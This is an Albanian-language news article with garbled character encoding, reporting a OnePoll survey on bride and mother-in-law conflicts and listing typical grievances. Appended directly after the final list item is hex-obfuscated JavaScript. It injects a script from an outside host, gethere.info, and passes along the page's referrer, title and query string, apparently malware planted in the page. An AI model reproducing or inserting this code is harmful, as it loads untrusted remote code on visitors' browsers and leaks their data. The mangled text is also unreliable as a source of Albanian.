mother

A�do e dhjeta nuse nuk flet me vjehrrA�n

c wlik. Arsyet mA� tA� shpeshta tA� armiqA�sie tA� nuseve me vjehrrat janA� a�?shitja e mendvea�?, pA�rzierja nA� martesA�, rritja/edukimi dhe financat, si edhe frazat a�?NA� kohA�n time…a�?, a�?unA� do ta kisha bA�rA� kA�shtu…a�?.

Rreth 40 pA�r qind tA� nuseve kanA� marrA�dhA�nie tA� kA�qija me vjehrrat, ndA�rsa shumA� bA�jnA� luftA�ra tA� pA�rditshme me to pA�r shkak tA� kA�shillave a�?dashamirA�sea�?, ka treguar hulumtimi online i faqes sA� internetit OnePoll. Madje njA� e dhjeta e nuseve pA�r shkak tA� grindjeve tA� shpeshta nuk flet me vjehrrA�n, ndA�rsa arsyeja mA� e shpeshtA� pA�r mosmarrA�veshjet janA� ndA�rhyrjet e tyre nA� rritjen e fA�mijA�ve, shkruan Daily Mail.

Vjehrrat tA� cilat nuseve tA� veta shpesh u thonA� frazat si a�?NA� kohA�n time … a�? ose a�?UnA� e kam bA�rA� kA�shtu … a�? janA� mA� tA� urryerat nA� popullatA�n femA�rore, ndA�rsa disa shkojnA� aq larg sa qA� rejave u japin kA�shilla tA� modA�s ose financiare, kanA� zbuluar hulumtuesit.

Rreth gjysma e femrave tA� martuara thonA� se si janA� grindur me partnerin pA�r shkak tA� ndA�rhyrjes sA� nA�nA�s nA� jetA�n e tyre, ndA�rsa 15 pA�r qind madje kanA� menduar tA� ndA�rprisnin tA�rA�sisht marrA�dhA�niet me vjehrrA�n.

Shkeljet mA� tA� mA�dha tA� vjehrraveA�
* DhA�nia e kA�shillave pA�r rritje mA� tA� mirA� tA� fA�mijA�ve;
* Sjellja sikur dinA� gjithA�ka, dhe nA� veA�anti mA� mirA� se nuset;
* Deklaratat si a�?unA� do tA� kisha bA�rA� kA�shtua�?, a�?NA� kohA�n time kemi bA�rA� kA�shtua�?;
* Kriticizmi i nuseve si nA�na;
* DhA�nia e A�mbA�lsirave tA� tepA�rta dhe ushqimit tA� pashA�ndetshA�m fA�mijA�ve;
* Pretendimi qA� dinA� mA� mirA� se sa nA�nat e tyre se A�farA� dA�shirojnA� nipA�rit/mbesat e tyre;
* MosdA�gjimi i nuses;
* TA� theksuarit qA� djalin e vet e njohin mA� mirA� se gruaja e tij;
* Rregullimi dhe pastrimi sapo futen nA� shtA�pinA� e nuses;
* PA�rzierja nA� financat e djalit dhe nuses;
* Marrja nA� pyetje e djalit nA�se ha diA�ka, sepse duket i dobA�t;
* ThA�nia nuses qA� duhet tA� dobA�sohet;
* Kritikat kuzhinA�s sA� nuses.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}